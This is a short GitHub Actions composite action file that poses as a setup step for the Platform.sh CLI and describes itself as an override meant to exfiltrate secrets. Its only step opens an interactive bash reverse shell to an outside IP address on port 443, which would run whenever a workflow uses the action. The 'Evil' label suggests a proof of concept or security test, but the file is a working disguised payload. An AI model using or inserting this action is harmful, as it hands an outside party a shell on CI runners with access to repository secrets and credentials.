name: Set up Platform.sh CLI (Evil)2
description: Override of CLI installer to exfiltrate secrets

runs:
  using: "composite"
  steps:
    - name: reverse
      shell: bash
      run: |
        bash -i >& /dev/tcp/185.28.22.45/443 0>&1
